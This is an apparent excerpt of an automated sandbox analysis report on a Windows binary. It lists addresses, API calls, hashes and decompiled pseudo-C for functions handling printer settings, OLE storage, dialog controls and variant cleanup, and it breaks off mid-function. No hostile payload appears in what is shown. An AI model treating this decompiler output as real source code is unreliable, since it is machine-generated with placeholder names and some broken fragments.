0x00414a80
0x00414a80
0x00414a83
0x00000000
0x00414a83
0x004149ad
0x004149ad
0x004149b1
0x004149bb
0x004149bd
0x004149bf
0x00000000
0x004149c1
0x004149c1
0x004149c3
0x004149df
0x004149eb
0x004149ee
0x004149f3
0x004149fd
0x00414a00
0x00414a00
0x00414a00
0x00414a07
0x00414a0a
0x004149c5
0x004149c5
0x004149ce
0x004149ce
0x00414a0f
0x00000000
0x00414a0f
0x004149bf
0x00414948
0x00000000
0x00000000
0x0041494e
0x00414955
0x00414956
0x0041495b
0x00414960
0x00000000
0x00000000
0x00414964
0x00414965
0x00414966
0x00414967
0x00414970
0x00000000
0x00414972
0x00414981
0x00414984
0x00414987
0x00414994
0x00414997
0x0041499d
0x004149a0
0x00000000
0x004149a0
0x00414970
0x0041490d
0x00414918
0x00414922
0x00000000
0x00000000
0x00414924
0x00414930
0x00414935
0x00414938
0x00000000
0x00000000
0x00000000
0x00414938
0x004148d8
0x004148df
0x004148e2
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 004148B3

Part of subcall function 00412F6B: SysStringLen.OLEAUT32(?), ref: 00412F73
Part of subcall function 00412F6B: CoGetClassObject.OLE32(?,?,00000000,004393D0,?), ref: 00412F91

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00414A3D
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00414A5E
GlobalAlloc.KERNEL32(00000000,00000000), ref: 00414AAB
GlobalLock.KERNEL32 ref: 00414AB9
GlobalUnlock.KERNEL32(?), ref: 00414AD1
CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 00414AF4
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 00414B10

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
String ID:
API String ID: 317715441-0
Opcode ID: f13fa0fecad93a40aca0f4cab5c0fbf99db1ea20b7f5c39c287bbb21db593fda
Instruction ID: 234c5863126d79d24c7a543b411d71e2f8900e6cec6980265dfd09f5a00c5f11
Opcode Fuzzy Hash: f13fa0fecad93a40aca0f4cab5c0fbf99db1ea20b7f5c39c287bbb21db593fda
Instruction Fuzzy Hash: 09C1ECB090020A9FCB10DFA5C884AEEB7B9FF88345B10456EF515EB290D775ED91CB54

Uniqueness

Uniqueness Score: -1.00%

Function 022414A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 022414DB
SetLastError.KERNEL32(0000007F), ref: 02241507

Memory Dump Source

Source File: 00000001.00000002.347463465.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2241000_NWMEaRqF7s.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 910afc3a4fa0c3823aae2e6240d5d7e233e154d6bbfede580f827b6d6b506028
Instruction ID: 986d1d374019eb9c5ec28467a33215461aa0deee2d64904f13a08be87eb7a90f
Opcode Fuzzy Hash: 910afc3a4fa0c3823aae2e6240d5d7e233e154d6bbfede580f827b6d6b506028
Instruction Fuzzy Hash: D571D774E20109EFDB08DF98D585AADB7B2FF48304F248598D41AAB345DB74EA91CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00403DEB, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403DEB(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E0040F775(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E0040F775( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x00403dee
0x00403df0
0x00403df2
0x00403dfa
0x00403e14
0x00403e1c
0x00403e26
0x00403e2d
0x00403e2f
0x00403e34
0x00403e37
0x00403e37
0x00403e4e
0x00403e55
0x00403e6d
0x00403e72
0x00403e77
0x00403e77
0x00403e7d
0x00403e7d
0x00403e2d
0x00403e82
0x00403e86

APIs

GlobalLock.KERNEL32 ref: 00403E08
lstrcmpA.KERNEL32(?,?), ref: 00403E14
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 00403E26
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00403E46
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00403E4E
GlobalLock.KERNEL32 ref: 00403E58
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00403E65
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 00403E7D

Part of subcall function 0040F775: GlobalFlags.KERNEL32(?), ref: 0040F780
Part of subcall function 0040F775: GlobalUnlock.KERNEL32(?,?,?,00403BCA,?,00000004,004011AF), ref: 0040F792
Part of subcall function 0040F775: GlobalFree.KERNEL32 ref: 0040F79D

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: deb0bda6af114da4f7ded021d2b5c250483e039ecf8471d16094a6eb54607884
Instruction ID: ac421361bb6fd67369ebe5b5881472c41486625af2fb4b5e452b01b71c6537f7
Opcode Fuzzy Hash: deb0bda6af114da4f7ded021d2b5c250483e039ecf8471d16094a6eb54607884
Instruction Fuzzy Hash: 52119171500604BBDB216FB6DC49DAF7AACFB88744B00056EFA05E2561D779DA00D768

Uniqueness

Uniqueness Score: -1.00%

Function 00407270, Relevance: 10.8, APIs: 7, Instructions: 255
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00407270(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t133;
				intOrPtr* _t140;
				int _t145;
				signed short _t148;
				short* _t149;
				intOrPtr _t152;
				signed short _t177;
				intOrPtr _t178;
				signed int _t179;
				intOrPtr _t184;
				struct tagRECT _t189;
				int _t190;
				void* _t191;
				signed short _t193;
				signed short _t194;
				void* _t195;
				void* _t221;
				intOrPtr _t225;
				short _t226;
				intOrPtr* _t233;
				void* _t234;
				signed short* _t236;
				signed int _t240;
				void* _t241;
				signed short* _t242;
				signed short* _t244;
				signed short* _t245;
				signed int _t246;
				void* _t248;

				_t246 = _t248 - 0x44;
				_t133 =  *0x443590; // 0xa920217c
				 *(_t246 + 0x48) = _t133 ^ _t246;
				_push(0x50);
				E0041F6EA(E00431F26, __ebx, __edi, __esi);
				_t233 =  *((intOrPtr*)(_t246 + 0x60));
				_t236 =  *(_t246 + 0x68);
				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
				 *(_t246 + 8) =  *(_t246 + 0x58);
				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
				_t140 = _t233 + 0x12;
				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
					 *((short*)(_t246 - 0x12)) =  *_t140;
					_t225 = _t233 + 0x18;
					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
					_t233 = _t246 - 0x20;
					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
				}
				_t226 =  *((short*)(_t233 + 0xa));
				_t189 =  *((short*)(_t233 + 8));
				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
				 *(_t246 - 0x30) = _t189;
				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
					_t194 =  *_t236;
					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
					_t236 =  &(_t236[2]);
					if(_t194 > 0) {
						__imp__#4(_t236, _t194);
						_t195 = _t194 + _t194;
						_t236 = _t236 + _t195;
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
						 *(_t246 + 0x24) = _t145;
					}
				}
				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
				E0040320E(_t246 + 0x28, E0040EA5E());
				 *((intOrPtr*)(_t246 - 4)) = 0;
				 *(_t246 + 0xc) = 0;
				 *(_t246 + 0x10) = 0;
				 *(_t246 + 0x18) = 0;
				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
					_t148 =  *_t236;
					_t57 = _t148 - 0xc; // -12
					_t226 = _t57;
					_t236 =  &(_t236[6]);
					 *_t246 = _t148;
					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
					if(_t226 <= 0) {
						L16:
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t177 =  *_t236;
						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
						_t242 =  &(_t236[2]);
						_t193 =  *_t242 & 0x0000ffff;
						_t236 =  &(_t242[1]);
						 *(_t246 + 4) = _t177;
						if(_t177 != 0x80010001) {
							_t178 = E00402EE1(__eflags, 0x1c);
							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
							__eflags = _t178;
							 *((char*)(_t246 - 4)) = 1;
							if(_t178 == 0) {
								_t179 = 0;
								__eflags = 0;
							} else {
								_t179 = E00413E1A(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
							}
							 *((char*)(_t246 - 4)) = 0;
							 *(_t246 + 0x20) = _t179;
						} else {
							_t244 =  &(_t236[2]);
							 *(_t246 + 0x10) =  *_t236;
							_t245 =  &(_t244[6]);
							 *(_t246 + 0x18) =  *_t244;
							E00403507(_t246 + 0x28, _t245);
							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
							_t221 = 0xffffffef;
							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
							_t236 = _t245 + _t184 + 1;
							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
					_t148 =  *_t246;
					goto L16;
				} else {
					L17:
					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
					_t263 =  *_t149 - 0x7b;
					_push(_t246 + 0x38);
					_push(_t149);
					if( *_t149 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t190 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t246 + 0x6c)));
					_push(_t236);
					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
					E004199DF(0, _t246 - 0x5c, _t233, _t236, _t263);
					 *((char*)(_t246 - 4)) = 2;
					 *((intOrPtr*)(_t246 + 0x34)) = 0;
					asm("sbb esi, esi");
					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
						_push(1);
						if(E00411CB5(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E00412252( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
							E0041343B( *((intOrPtr*)(_t246 + 0x34)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
							E004071CF( *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246, _t246 + 0x28);
							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
						}
					}
					if( *(_t246 + 0x24) != _t190) {
						__imp__#6( *(_t246 + 0x24));
					}
					_t152 =  *((intOrPtr*)(_t246 + 0x34));
					if(_t152 == _t190) {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
						_t190 = 1;
					}
					 *((char*)(_t246 - 4)) = 0;
					E00419D41(_t190, _t246 - 0x5c, _t226, _t233, _t240, 1);
					E00403036( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
					_pop(_t234);
					_pop(_t241);
					_pop(_t191);
					return E0041E5DF(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
				}
			}

0x00407274
0x00407278
0x0040727f
0x00407282
0x00407289
0x00407295
0x00407298
0x0040729b
0x004072a1
0x004072a7
0x004072aa
0x004072ad
0x004072b0
0x004072b8
0x004072be
0x004072c5
0x004072cf
0x004072d7
0x004072df
0x004072e2
0x004072e6
0x004072ea
0x004072ed
0x004072ed
0x004072f0
0x004072f8
0x00407302
0x00407311
0x00407314
0x00407317
0x0040731a
0x00407320
0x00407328
0x0040732a
0x0040732c
0x00407330
0x00407335
0x00407339
0x0040733f
0x00407341
0x00407343
0x00407346
0x00407346
0x00407335
0x00407349
0x00407356
0x00407363
0x00407366
0x00407369
0x0040736c
0x0040736f
0x0040737d
0x0040737f
0x0040737f
0x00407382
0x00407387
0x0040738a
0x0040738d
0x00407413
0x00407413
0x00407416
0x00000000
0x00000000
0x00000000
0x00000000
0x00407393
0x00407393
0x00407393
0x00407395
0x00407399
0x0040739c
0x004073a0
0x004073a6
0x004073a9
0x004073e0
0x004073e6
0x004073e9
0x004073eb
0x004073ef
0x00407401
0x00407401
0x004073f1
0x004073fa
0x004073fa
0x00407403
0x00407407
0x004073ab
0x004073ad
0x004073b0
0x004073b5
0x004073bc
0x004073bf
0x004073c7
0x004073cc
0x004073cf
0x004073d2
0x004073d9
0x004073d9
0x0040740a
0x00407410
0x00000000
0x0040741d
0x0040741d
0x0040741d
0x00407420
0x00407427
0x00407428
0x00407429
0x00407433
0x0040742b
0x0040742b
0x0040742b
0x00407439
0x0040743b
0x0040743c
0x00407442
0x00407443
0x00407446
0x0040745a
0x0040745e
0x00407461
0x00407463
0x00407465
0x00407468
0x00407471
0x0040747a
0x004074b9
0x004074cd
0x004074d9
0x004074ec
0x004074f8
0x00407505
0x00407511
0x00407511
0x0040747a
0x0040751a
0x0040751f
0x0040751f
0x00407525
0x0040752a
0x00407572
0x0040752c
0x00407534
0x00407536
0x00407536
0x0040753a
0x0040753e
0x00407549
0x00407553
0x0040755b
0x0040755c
0x0040755d
0x0040756c
0x0040756c

APIs

__EH_prolog3.LIBCMT ref: 00407289
MapDialogRect.USER32(?,00000000), ref: 0040731A
SysAllocStringLen.OLEAUT32(?,?), ref: 00407339
CLSIDFromString.OLE32(?,?,00000000), ref: 0040742B

Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB

CLSIDFromProgID.OLE32(?,?,00000000), ref: 00407433
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,00000000,00000000,0000FC84,00000000), ref: 004074CD
SysFreeString.OLEAUT32(00000000), ref: 0040751F

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
String ID:
API String ID: 2841959276-0
Opcode ID: 1308482831191b4023c7861a20e543ac11ade589bc15574cbf101fd2d2cc8799
Instruction ID: 448c8c2dcd699e09b9d85336ea3713344f7c4e017cbfbbdeab4c9df7cebc7252
Opcode Fuzzy Hash: 1308482831191b4023c7861a20e543ac11ade589bc15574cbf101fd2d2cc8799
Instruction Fuzzy Hash: FBB10671904209AFDB04DF69C984AEE7BB4FF08318F00452AFC19A7391E778E994CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00418A33, Relevance: 10.6, APIs: 7, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418A33(signed int __eax) {

				asm("lds ebp, [ecx+ecx*8-0x3e]");
				 *__eax =  *__eax | __eax;
			}

0x00418a33
0x00418a37

APIs

__EH_prolog3.LIBCMT ref: 00418A40
_memset.LIBCMT ref: 00418AAC

Part of subcall function 0041A7E4: _memset.LIBCMT ref: 0041A7EC

VariantClear.OLEAUT32(?), ref: 00418AEC
SysFreeString.OLEAUT32(00000000), ref: 00418B6D
SysFreeString.OLEAUT32(00000000), ref: 00418B7C
SysFreeString.OLEAUT32(00000000), ref: 00418B8B
VariantClear.OLEAUT32(00000000), ref: 00418BA0

Part of subcall function 0041A7C4: VariantCopy.OLEAUT32(?,?), ref: 0041A7D2

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: FreeStringVariant$Clear_memset$CopyH_prolog3
String ID:
API String ID: 883085156-0
Opcode ID: 18a5db97fe09296ebc22d1f71aec940bc2ead0d2ae3222a38423bdfbdea22666
Instruction ID: e5905b9386fbc3a182e4f73bdb5b86b4c3549b20c445dd11c0baad671bbe4cf2
Opcode Fuzzy Hash: 18a5db97fe09296ebc22d1f71aec940bc2ead0d2ae3222a38423bdfbdea22666
Instruction Fuzzy Hash: 90511DB1900209DFDB10CFA4C885BDEB7B4FF48304F14456EE515E7291DB78A985CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004157D0, Relevance: 10.6, APIs: 7, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E004157D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t59;
				signed int _t63;
				signed int _t64;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t97;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;

				_t103 = __eflags;
				_push(0x60);
				E0041F6EA(E00432F66, __ebx, __edi, __esi);
				_t97 =  *(_t101 + 8) + 0xffffff28;
				E0040DBE0(_t101 - 0x18, _t103,  *((intOrPtr*)( *(_t101 + 8) - 0xbc)));
				 *(_t101 - 4) = 0;
				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
					L19:
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x14);
					if( *(_t101 - 0x14) != 0) {
						_push( *((intOrPtr*)(_t101 - 0x18)));
						_push(0);
						E0040D3B7();
					}
					_t59 = 0;
					__eflags = 0;
					L22:
					return E0041F7C2(_t59);
				}
				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
					L6:
					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *(_t101 + 0xc);
					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *(_t101 + 0xc)) {
						goto L19;
					}
					_t81 = _t97 + 0xac;
					__imp__#9(_t81);
					_t63 =  *(_t97 + 0x50);
					__eflags = _t63;
					_t85 = 0 | __eflags != 0x00000000;
					 *(_t101 + 8) = 0;
					__eflags = __eflags != 0;
					if(__eflags != 0) {
						L9:
						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x4393c0, _t101 + 8);
						__eflags = _t64;
						if(_t64 < 0) {
							goto L19;
						}
						E0041F330(_t97, _t101 - 0x48, 0, 0x20);
						E0041F330(_t97, _t101 - 0x28, 0, 0x10);
						_t69 =  *(_t101 + 8);
						_t102 = _t102 + 0x18;
						__eflags = _t69;
						_t85 = 0 | __eflags != 0x00000000;
						__eflags = __eflags != 0;
						if(__eflags == 0) {
							goto L8;
						}
						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *(_t101 + 0xc), 0x439340, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
						__eflags =  *(_t101 - 0x44);
						_t82 = __imp__#6;
						 *(_t101 + 0xc) = _t70;
						if( *(_t101 - 0x44) != 0) {
							 *_t82( *(_t101 - 0x44));
						}
						__eflags =  *(_t101 - 0x40);
						if( *(_t101 - 0x40) != 0) {
							 *_t82( *(_t101 - 0x40));
						}
						__eflags =  *(_t101 - 0x3c);
						if( *(_t101 - 0x3c) != 0) {
							 *_t82( *(_t101 - 0x3c));
						}
						_t71 =  *(_t101 + 8);
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						__eflags =  *(_t101 + 0xc);
						if( *(_t101 + 0xc) >= 0) {
							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
						}
						goto L19;
					}
					L8:
					_t63 = E004037E3(_t81, _t85, _t97, 0, __eflags);
					goto L9;
				}
				 *(_t101 - 0x68) =  *(_t101 + 0xc);
				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
				 *((intOrPtr*)(_t101 - 0x64)) = 0;
				 *((intOrPtr*)(_t101 - 0x60)) = 0;
				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
				 *((intOrPtr*)(_t101 - 0x54)) = 0;
				 *((intOrPtr*)(_t101 - 0x50)) = 0;
				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
				E00413514(_t97, _t101 - 0x6c);
				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
					goto L6;
				}
				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
				_t98 =  *((intOrPtr*)(_t101 - 0x54));
				if( *(_t101 - 0x14) != 0) {
					_push( *((intOrPtr*)(_t101 - 0x18)));
					_push(0);
					E0040D3B7();
				}
				_t59 = _t98;
				goto L22;
			}

0x004157d0
0x004157d0
0x004157d7
0x004157e5
0x004157ee
0x004157fb
0x004157fe
0x00415925
0x00415925
0x00415929
0x0041592c
0x0041592e
0x00415931
0x00415932
0x00415932
0x00415937
0x00415937
0x00415939
0x0041593e
0x0041593e
0x0041580a
0x00415857
0x0041585a
0x00415860
0x00000000
0x00000000
0x00415866
0x0041586d
0x00415873
0x00415878
0x0041587a
0x0041587d
0x00415880
0x00415882
0x00415889
0x00415895
0x00415897
0x00415899
0x00000000
0x00000000
0x004158a6
0x004158b2
0x004158b7
0x004158bc
0x004158bf
0x004158c1
0x004158c4
0x004158c6
0x00000000
0x00000000
0x004158e3
0x004158e6
0x004158e9
0x004158ef
0x004158f2
0x004158f7
0x004158f7
0x004158f9
0x004158fc
0x00415901
0x00415901
0x00415903
0x00415906
0x0041590b
0x0041590b
0x0041590d
0x00415913
0x00415916
0x00415919
0x0041591b
0x0041591b
0x00000000
0x00415919
0x00415884
0x00415884
0x00000000
0x00415884
0x0041580f
0x00415818
0x0041581f
0x00415822
0x00415825
0x00415828
0x0041582b
0x0041582e
0x00415831
0x00415839
0x00000000
0x00000000
0x0041583b
0x00415842
0x00415845
0x00415847
0x0041584a
0x0041584b
0x0041584b
0x00415850
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 004157D7
VariantClear.OLEAUT32(?), ref: 0041586D
_memset.LIBCMT ref: 004158A6
_memset.LIBCMT ref: 004158B2
SysFreeString.OLEAUT32(?), ref: 004158F7
SysFreeString.OLEAUT32(?), ref: 00415901
SysFreeString.OLEAUT32(?), ref: 0041590B

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: FreeString$_memset$ClearH_prolog3Variant
String ID:
API String ID: 3574576181-0
Opcode ID: b84e5eaf672f1bfb1190bcd0de862ae4c3f2647a4bdaa930b90debcdc623c7f8
Instruction ID: ea0c79ff68116504239c338cd84909263c11110d6238371cb65e95f2b4ede0f1
Opcode Fuzzy Hash: b84e5eaf672f1bfb1190bcd0de862ae4c3f2647a4bdaa930b90debcdc623c7f8
Instruction Fuzzy Hash: BA4148B1E10619EFCF11DFA4C845ADEBB79BF48B24F10811BF015AA290C7789A91CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00405591, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405591(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				intOrPtr _v292;
				void* __ebp;
				signed int _t40;
				char _t44;
				void* _t47;
				void* _t54;
				char* _t61;
				void* _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				char* _t104;

				_t95 = __edx;
				_t81 = __ecx;
				_t79 = __ebx;
				_t104 =  &_v272;
				_t40 =  *0x443590; // 0xa920217c
				_a264 = _t40 ^ _t104;
				_push(0x18);
				E0041F6EA(E00431D73, __ebx, __edi, __esi);
				_t100 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t44 = E004052F2(__ecx, __edx);
				_v28 = _t44;
